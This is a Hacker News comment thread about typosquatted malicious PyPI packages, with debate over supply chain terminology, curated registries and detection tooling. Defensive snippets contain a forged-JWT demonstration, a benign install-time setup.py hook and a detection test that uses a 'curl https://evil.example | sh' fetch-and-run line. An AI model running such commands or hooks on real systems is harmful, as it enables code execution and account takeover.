Supply Chain Attack Using PyPI Packages “Colorslib”, “Httpslib”, and “Libhttps” (fortinet.com)
104 points by campuscodi on Jan 15, 2023 | 57 comments


I really dislike this dilution of “zero-day” and “supply chain attack”: these are typosquats, not package takeovers. There’s no evidence that they’re widely affecting companies or individual developers whatsoever.

In general, you can apply a “repetition” test to these sorts of 0day claims: if the attacker can create infinite “0days” using the exact same technique, it’s not an 0day.

Edit: More generally, otherwise serious security companies should be ashamed to publish dreck like this. It’s one thing to highlight a tool that automatically detects new typosquats (this would be a genuinely useful contribution to most packaging ecosystems!); it’s another thing entirely to breathlessly hype non-existent attacks. This kind of false vigilance breeds exactly the kind of complacency that it’s supposedly intended to prevent.


Yeah. I was ranting about a similar thing in the context of jsonwebtoken to our security guy a few days ago. The vulnerability pretty much goes "Well, if I can inject an object with a toString() method of my choosing into your running program, then you're totally vulnerable". Yeah, if you can inject and execute code... you have achieved RCE? Kind of like the whole pickle discussion from Python.

And nonetheless, the assumed precondition for the vulnerability lets you poison the key used to verify web tokens, so if you can inject data there, very big things immediately explode, like the entire authentication of the system collapsing.
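
To make that concrete, here's a rough Python analogue (the actual bug being discussed is in the Node jsonwebtoken library; this sketch just uses PyJWT to show why attacker control of the verification key is already game over, no library bug required):

  # Sketch only: if an attacker can choose the key that jwt.decode() trusts,
  # they can mint tokens that verify, regardless of any parsing tricks.
  import jwt  # PyJWT

  attacker_key = "attacker-controlled-secret"  # hypothetical injected value
  forged = jwt.encode({"sub": "admin", "role": "superuser"}, attacker_key, algorithm="HS256")
  claims = jwt.decode(forged, attacker_key, algorithms=["HS256"])  # "verifies" fine
  print(claims)  # {'sub': 'admin', 'role': 'superuser'}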

But anyway, it's going around as a 7.6 with "trivial exploitation" in "JWTs", and OIDC uses those... and now I have scared developers, POs, and customers calling, and so on.

This makes it quite challenging, and honestly somewhat exhausting, to define a reasonably straightforward security process which doesn't cause alert fatigue very quickly.


I saw that vuln categorized as "RCE" and had the same reaction. IIRC it was prototype pollution in an npm package during JSON deserialization - if you are letting attackers define JavaScript functions in your Node.js process, you have almost certainly already lost. The details were vague at the time, so I had hoped I was just missing context.


I know some folks in the security industry. There is a crazy wide gap between capable security people and services and downright frauds.

To some extent that exists everywhere but at least say a developer who is terrible and can’t ship anything gets filtered out at some point. Security land is absurd.

All the security people I know are very sensitive about it and have, in many situations, felt the need to quit (or have quit) a job after a fraud was hired. They're not dogmatic about security, but they do care deeply about being productive and have a sense that it's their job to provide quality advice and actions.


Yep. Seems like the last two years have really given rise to spammy or fraudulent security "researchers" who are just trying to get payouts. It's been plaguing a number of projects on GitHub for a while now.


GitHub itself is building extensive command/test/control mechanisms, along with CI pipelines and internal security approval lists, for the explicit purpose of billing for all of that, and of requiring it opportunistically.


If it is well done, I can see how that would be popular.


Billing for what, exactly?


> I really dislike this dilution of “zero-day” and “supply chain attack”

Agree, except it's not a matter of like/dislike, it's just plain wrong.


Unfortunately, it's marketing bull. As long as they can get wider exposure by being factually incorrect, they'll be factually incorrect.

There are good technical reasons to make a distinction, like between Trojan and virus, but they don't care. They won't be ashamed, as much as they should be.


Maybe they did this just to get posted on HackerNews (:


Tragically, we will get more articles in this genre, as "security" attracts government funding, and faux security acts are enabled via budgets and megaphones.


Yep. It bums me out as a contributor to both package indices and someone working on “supply chain” tooling; there’s serious and interesting work to be done here, but it’s general work (universal codesigning, automatic typosquat restrictions in indexes) rather than this kind of lazy blogspam “exploit” whac-a-mole.


This. Moreover, such typo-squatting attacks could easily be mitigated by using a private package registry.


As far as I understand, this is just a typosquatting attack, or more like a Google SEO squatting attack. There are no normal Python libraries anyone would use under these names. These packages are often made as clones of an official package, just published under a new name. There is no reason to choose a cloned package with a different name over the official one.

This is business as usual for PyPI. I reported ~3 cloned malicious packages last year and they were taken down. Only a very inexperienced or unlucky software developer would fall for this attack, because these packages are not part of any supply chain. Thus, I feel calling this a supply chain attack is incorrect. Maybe "watering hole attack" would be closer to the truth.


Correct. These kinds of spam typosquatted packages are a feature of life on public packaging indexes, especially ones that have flat namespaces.

It’s not ideal, but it’s very far from a reasonable use of “0day” or an attack on an actual supply chain.


You can typosquat on non-flat indices as well: org.apache.logging.log4j => org.apoche.logging.log4j, @babel/plugin-whatever => @babal/plugin-whatever, etc. I guess one argument against that is people are less likely to type the really long names by hand.

Edit: And it’s harder to land on the typo you squatted in a longer name.


https://blog.sonatype.com/malware-removed-from-maven-central

"Unlike most other open source software component ecosystems, Maven is built upon a strong namespacing concept that requires that every artifact be addressed using (minimally) a three part coordinate: Group ID : Artifact ID : Version. Group IDs follow the Java Package convention which is the reverse of a development team’s DNS. For example, all Apache Software Foundation artifacts have org.apache as the start of their Group ID. Org.apache.maven is Maven, org.apache.struts is Struts etc."


There was this instance which was a bit sneakier, by taking a package name in a default repository which shadowed a name in a more specialised repository: https://news.ycombinator.com/item?id=34313208


It's kind of amazing to me that this is still a thing.

Supply chain attacks on the client machine basically don't exist in Linux distributions. If you're downloading a Linux distro package from the distro's official repositories, it has been signed by the distribution, and a human being working for the distro has entered that package into the repository as a real (not-malware) package.

These free-for-all ecosystems where anyone can put any package into the repository, where signing isn't required, and where nobody is gatekeeping even the name of the package, are just... insane. Do you want a free-for-all, or do you want curation and quality? You can't have both.

Until there are new, curated, quality public repositories, I think the bare minimum requirement for all companies should be that they must host their own package repository, and 2 people must sign off on adding a package, with details about the package's ownership, signing key, source repository, how recent the project is, how many releases they have, etc. The basic due diligence that a package maintainer normally does. Shipping anything to prod that someone just downloaded from PyPI should be a non-starter.
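
For the hosting part, the pip side is simple enough. A minimal sketch, assuming a hypothetical internal index at pypi.internal.example, is to point pip at it and only it, so nothing falls through to public PyPI by accident:

  # ~/.config/pip/pip.conf (pip.ini on Windows) -- host name is made up
  [global]
  index-url = https://pypi.internal.example/simple/

The two-person sign-off and the due diligence are still process on top of that, of course; the config only controls where packages come from.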


> Do you want a free-for-all, or do you want curation and quality?

Based on my experience, people prefer a free-for-all over distributions with outdated and/or missing packages.

I write packages for cheminformatics, which is a mix of CS and chemistry. There are very few people who can curate in this field - far fewer than the number of producers. But there are some, like Debichem for Debian.

Debichem distributed two of my packages. One was years out of date, and despite repeated attempts to inform them about newer versions, I never heard back from them. Instead, Debian users downloaded it from PyPI.

The other was, oddly, a package that was published on my web site (not PyPI) for external feedback before being integrated into RDKit (a much larger package in my field). It wasn't meant for general distribution through something like Debian, and I only found out years later.

No other package distributor has picked up my work.

> I think the bare minimum requirement for all companies should be that they must host their own package repository, and 2 people must sign off on adding a package

You and I live in far different computing environments. My customers include academics and single researchers in a non-IT-savvy company. And "prod" may start and end with "works for me, that's all I care about."


The way Linux distributions typically deal with that is: you host your packages in your own repository, provide your users with instructions on how to add that repository, and have them install your packages from it. That's how big vendors keep their users' packages up to date, or avoid having to maintain packages for multiple distros (ex: ship one Debian package in your own repo that works on all Debian-esque distros).

A compromise would be that new projects added to PyPI go through a vetting system, and a package maintainer's signing key gets added. Then they can push updated builds as much as they want, as long as it's signed by the maintainer. Less secure than distro-maintained packages, but it prevents typosquatting and simpler attacks on package integrity.
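
For the package-integrity half of that, pip already has something narrower: hash-pinning. It doesn't check a maintainer's signature, but a swapped or typosquatted artifact won't install because its digest won't match. A sketch of a requirements.txt entry (the digest below is a placeholder, not a real hash):

  # install with: python -m pip install --require-hashes -r requirements.txt
  requests==2.28.2 \
      --hash=sha256:0123456789abcdef  # placeholder; pin the digest of the artifact you actually vetted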


> That's how big vendors keep their users' packages up to date

What do small vendors, single developers, and hobbyists do?

I don't even supply wheels for Microsoft Windows since that's not worth the difficulty. I can't imagine supporting {py3.8, 3.9, 3.10, 3.11} x {deb, rpm, whatever}, and providing installation instructions for the different platforms.

For what it's worth, I do host my packages myself, and tell people to:

  python -m pip install chemfp -i https://chemfp.com/packages/
Luckily, I also have a safety net. I have an old (Python 2.7-only) distribution on PyPI. Even with the instructions, people will do "pip install chemfp" (without the "-i" index URL) and end up installing from PyPI. This then fails, so they either contact me, or read the instructions, or give up.

> A compromise would be that new projects added to PyPI go through a vetting system

Who will do that? Who will adjudicate conflicts? Who pays for their time?

As I understand it, the PyPI maintainers are already pretty busy. I also pointed out how Debichem, a volunteer vetting effort for chemistry packages in Debian, isn't able to provide timely vetting.

> but it prevents typosquatting and simpler attacks on package integrity.

How would it prevent typosquatting? What prevents someone from setting up "chamfp"?


It's very commonplace to build software yourself! How else do you make changes to the software?! Trusting build tools and sandboxing build users has proven to be very very difficult to do completely. Still, what's the point of OSS if you only ever download and use prebuilt images?


That's a different thing though. Distro packages have to be approved by a human which adds a huge amount of admin overhead, delays and so on. I don't think anyone in most programming language communities wants that.

That said, I don't know why there isn't more assistance to prevent typos and so on. You could automatically scan for packages with similar names and wildly different download counts and just ask the user "are you sure you didn't mean httplib?"
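
Even something dumb like the following would catch a lot. A rough sketch with difflib from the standard library; the package list and download counts here are made up:

  import difflib

  # Hypothetical download counts, e.g. pulled from the index's stats.
  POPULAR = {"httplib2": 120_000_000, "requests": 900_000_000, "urllib3": 1_200_000_000}

  def check(name: str, downloads: int, threshold: float = 0.85) -> None:
      for popular, popular_downloads in POPULAR.items():
          similar = difflib.SequenceMatcher(None, name, popular).ratio() >= threshold
          if similar and downloads < popular_downloads / 1000:
              print(f"'{name}' looks a lot like '{popular}' -- are you sure you didn't mean that?")

  check("httpslib", downloads=4_200)  # warns: looks a lot like 'httplib2'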


> Distro packages have to be approved by a human which adds a huge amount of admin overhead, delays and so on. I don't think anyone in most programming language communities wants that.

Yes, and distro users complain that software isn't updated fast enough. Then you give them faster updates, and it breaks, and they complain more. If malware made its way in, they'd complain much more. On balance, security is much better for everyone than bleeding edge.

> You can automatically scan for similar packages with similar names and wildly different download counts and just ask the user "are you sure you didn't mean httplib?"

When? When they've already edited their requirements.txt file, committed, pushed to Git, and it's building on the CI server? You can't depend on developers to figure out if they meant httplib or httpiib or httplib (Unicode character spoofing). It's too easy to quickly choose the wrong thing, and the consequences can be dire. The wrong thing should simply never make it into stable repos, period.


People never learn.


Somewhat related question, do you think there is a market for vetted/audited/curated mirrors of the major language package registries such as PyPI and NPM?

These "uncurated" package managers will always be vulnerable to someone uploading compromised builds. Would people pay for a mirror of these that contain a curated list of vetted builds? It would probably only have a small subset of the origin registry.

The vetting or auditing could be at a couple of different levels: automatic, based on "trusted" authors and signed packages; automated code analysis; and higher-level manual vetting. Customers could request that packages on the open list be included in the curated and vetted version.

Obviously there will be some time lag between packages being uploaded to the origin and being vetted and placed on the curated mirror. Some sort of expedited process would be needed for security releases.

/random thought for the day


> do you think there is a market for vetted/audited/curated mirrors of the major language package registries

I personally wouldn't see much value in it, but it wouldn't surprise me if there was a market for it since it would be a good way for large companies to claim they're being responsible without doing anything but spending a (relatively) small amount of money.

The reason I don't think there's a lot of value in it is because having something curated or audited by anyone that isn't an expert in the niche isn't going to be super effective, is it? Maybe they can pick out obviously malicious code and there are some easy wins at the start, but I think bad actors would adapt and do a better job of obfuscating malicious code.


There is indeed a market for it; at least, Google thinks so: https://cloud.google.com/assured-open-source-software


As ever Google are unable to produce a homepage for an "enterprise" product that clearly describes what it does and how to use it.


I would love to see repo platform owners do something about new project repos, but that doesn't do anything when a developer ragequits and puts malicious code in their own repo that's been around for years.

Really, there is no good option if you want the repo platform to be accessible to new projects.


We’re building a private registry based on Packj [1] that hosts vetted artifacts. Will post more about it publicly soon.

1. https://github.com/ossillate-inc/packj flags malicious/risky packages.


> do you think there is a market for vetted/audited/curated library repositories

(Slightly fixed to make more general.)

There is a need, but there will not be a market until security is taken seriously by industry.[1]

[1] ETA unknown.


Anaconda Python and ActiveState Python are products in this space, I'd argue.


I don't want to speculate on exactly how the developer at CircleCI was compromised, but it wouldn't surprise me if it was something like this. They can be pretty easily targeted and it's trivial to get RCE on a developer's laptop during package install.

These are hard to detect for a few reasons:

  - Traditional endpoint protection is often disabled on developer machines
  - Developers require much more access to their machines to do their jobs
  - Installing packages in most programming languages still results in RCE at install time
  - Most solutions are aimed at protecting code once it makes it to CI and production, but developer machines are still the wild west
If you're not already operating in a world where you assume every developer laptop is compromised, you need to start. The only real protection here is requiring multi-party review for *everything*.
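
On the "RCE at install time" point: for Python, the hook is just setup.py, since building or installing an sdist executes that file. A minimal, benign sketch of a hypothetical package:

  # setup.py of a hypothetical package -- `pip install` of the sdist runs this code.
  import getpass, socket
  from setuptools import setup

  # Module-level code executes as soon as pip builds the package; a malicious
  # package would exfiltrate env vars, tokens, or SSH keys here instead of printing.
  print(f"install-time code ran as {getpass.getuser()} on {socket.gethostname()}")

  setup(name="totally-not-malware", version="0.0.1")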


This is not a compromised supply chain, but fake packages.

See my earlier comment here https://news.ycombinator.com/item?id=34390100

The fake packages are not part of any supply chain and are quite easy to detect. A more serious attack would be rigging an existing, widely used OSS package, but this is not what the post is about, and its title is somewhat misleading.


They can definitely inadvertently be part of someone's supply line. The official repository takes precedence over any locally configured repositories (say, an in-house package named libhttps).

When that package suddenly gets published onto the official repo, it may replace the intended package without the devs noticing until it's too late.

I think this is a flawed design for a package management tool but it's the tool we've got.

These packages could be random typosquats but they might also be targeted supply chain attacks against a specific company. With the CircleCI leak, the names of internal packages may just have leaked.


In pip, multiple configured indexes have equal priority; there's no precedence by order of configuration (if memory serves), so the deciding factor is the version, and the attacker would need to publish a higher version than the one used internally.

Either way, that’s not the attack described in the post, and is speculative to a degree that doesn’t warrant the “0day” descriptor. It’s also not actionable for companies that run entire PyPI mirrors rather than supplementary indexes, which is the norm.


Knowing the source code would make it easier.


> The official repository takes precedence over any locally configured repositories (say, an in-house package named libhttps).

Wow. I wonder how a repository manager like Nexus handles that. If there aren't any namespaces, would it suddenly go upstream and fetch something from the official repos?


I disagree here - these could be targeted, and just because we haven't seen impact yet doesn't mean there wasn't any. All it takes is one download by the right person, and then it can be pivoted into a supply chain attack.


For one, committing project dependencies into your SCM can go a long way. Treat 3P code as your code. Not only does this help prevent supply chain attacks, but it makes you more conscious of the stuff you're importing. Maybe you don't need a 10,000-line dependency for something you could have written in 15 lines of code. There are also other benefits to not depending on external servers for your build step, which can dramatically improve install time if you have a big project with many deps. Not to mention never worrying about dependency version mismatches. All the clones have the same copy of everything.

For languages with good package managers it might seem like an anti-pattern (why commit node_modules?). But stuff like this is standard for C++ development, for example.
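
For Python specifically, a low-tech way to do this is to vendor the exact artifacts into the repo and install offline from them. Something like the following, where the vendor/ directory name is arbitrary:

  # one-time (and on dependency bumps): download pinned deps into a vendored directory
  python -m pip download -r requirements.txt -d vendor/
  git add vendor/ && git commit -m "vendor dependencies"

  # everywhere else (dev machines, CI): install with the network index disabled
  python -m pip install --no-index --find-links vendor/ -r requirements.txt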


I understand where you are coming from, but comparing things to the state of third-party library usage in C++ will turn people off. It is in a really bad state, which is why things get checked in.


> Developers require much more access to their machines to do their jobs

I think this is a pretty untrue view that only seems to crop up in developer-focused communities. You don't need admin rights to write software. In cases where you need to interact with the system, you probably should be working inside virtual machines anyway.


There needs to be some way of automatically flagging package upgrades that might be malware.

Introducing calls to things like os.system or subprocess should be a red flag.

I feel like the pledge system would be a good model here: https://medium.com/@_neerajpal/pledge-openbsds-defensive-app...
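
A crude version of that flagging is easy to sketch with the ast module: diff the set of risky-looking calls between the old and new release and alert on anything new. The "risky" list here is illustrative, not exhaustive:

  import ast

  RISKY_CALLS = {"os.system", "subprocess.run", "subprocess.Popen"}  # illustrative only

  def risky_calls(source: str) -> set[str]:
      """Return dotted names of risky-looking calls found in a module's source."""
      found = set()
      for node in ast.walk(ast.parse(source)):
          if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                  and isinstance(node.func.value, ast.Name)):
              dotted = f"{node.func.value.id}.{node.func.attr}"
              if dotted in RISKY_CALLS:
                  found.add(dotted)
      return found

  old_src = "import requests\nrequests.get('https://example.com')\n"
  new_src = old_src + "import os\nos.system('curl https://evil.example | sh')\n"
  print(risky_calls(new_src) - risky_calls(old_src))  # {'os.system'} -> flag for human review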


Been working on this exact thing for nearly two years at https://www.phylum.io. We identified and reported about 1.2k packages in ecosystems like npm, PyPI, and others last year. We have a GitHub app that checks your PRs for malware. We also built a free, open source sandbox for package installations [1], so if malware does get executed it's done in a locked-down environment. Happy to chat further about this sort of thing, it's something I'm wildly interested in!

[1] https://github.com/phylum-dev/birdcage


I've been building Packj [1] to address exactly this problem. You can _audit_ as well as _sandbox_ installation of PyPI/NPM/RubyGems packages; it flags hidden malware or "risky" code behavior such as spawning a shell, use of SSH keys, and mismatches between GitHub code and packaged code (provenance).

1. https://github.com/ossillate-inc/packj flags malicious/risky packages.


Vendors like Sonatype already offer this for enterprises. I feel we're a long way from it being available in core OSS repositories though.

https://help.sonatype.com/fw/best-practices/release-integrit...


This is exactly what we provide at Socket. See https://socket.dev

We flag it whenever a package introduces something new: install scripts, network access, etc.


We’ve (https://www.phylum.io) been tracking this actor as well. There are more packages than this blog post notes, including: fredli, derkpy, and fredmi. The first packages from this actor appeared on Jan 1.

A bit of work has been done to RE the binary itself, and we've found references to the following GitHub repo: https://github.com/T4hg/frek/blob/master/__init__.py

Happy to chat with anyone that’s interested in this sort of thing. We’ve got a trove of samples that seems to grow daily!


Why are the repos still there, two weeks later?


We report them when we find them (to GitHub, PyPI, NPM, etc). Unfortunately the process on the other side isn't super quick. For example, we reported some malware to NPM on Dec 31, 2022 and received an email from them stating they were starting their investigation on Jan 9, 2023. The people responsible for removal are simply inundated with malware reports.

For GitHub, they just seem to be a bit more careful in what they remove. Malware (and other security related code) _can_ be used for educational purposes. As such, they aren't as quick to nuke this stuff from the site.

See their acceptable use policy:

> Note that GitHub allows dual-use content and supports the posting of content that is used for research into vulnerabilities, malware, or exploits, as the publication and distribution of such content has educational value and provides a net benefit to the security community. We assume positive intention and use of these projects to promote and drive improvements across the ecosystem.

https://docs.github.com/en/site-policy/acceptable-use-polici...

Even when they do act, it can be slow, unfortunately.


STOP AUTOMATICALLY DOWNLOADING CODE FROM THE INTERNET AND INCLUDING IT IN YOUR PRODUCT AS PART OF YOUR BUILD CHAIN. Why do I need to say this out loud?


Because for most people that's a stupid thing to say.

Supply chain attacks are very rare still (especially ones that aren't just typo squatting), and auditing all dependencies (which is I assume what you meant) is ridiculously time consuming and unreliable.

This small problem can 90% be solved through tool support, automated scanning and library sandboxing (which admittedly is not really supported by any languages yet - at least not without a lot of hoop jumping).


These packages are not part of any build chain. Please see my earlier comment here

https://news.ycombinator.com/item?id=34390100


Well all it takes is a typo in requirements.txt?



